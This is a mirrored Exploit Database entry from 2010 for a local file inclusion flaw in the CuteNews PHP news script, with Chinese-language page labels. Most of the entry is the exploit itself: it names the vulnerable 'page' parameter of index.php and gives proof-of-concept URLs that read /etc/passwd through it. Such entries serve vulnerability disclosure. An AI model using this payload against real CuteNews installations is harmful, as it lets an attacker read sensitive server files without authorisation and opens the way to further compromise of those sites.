CuteNews – ‘page’ Local File Inclusion

• Exploit Database
• 116 阅读

• 作者： eidelweiss
  日期： 2010-10-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15208/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  ========================================================== CuteNews (page) local File Inclusion Vulnerability ========================================================== vendor: http://cutephp.com/ Author: eidelweiss Contact: eidelweiss [at] windowslive [dot] com   ==========================================================   vuln: index.php?page=   lfi: /etc/passwd   exploit : index.php?page= [lfi]   -=[p0c]=- http://127.0.0.1/index.php?page= [lfi] or http://127.0.0.1/path/index.php?page=/etc/passwdt   =========================| -=[ E0F ]=- |============================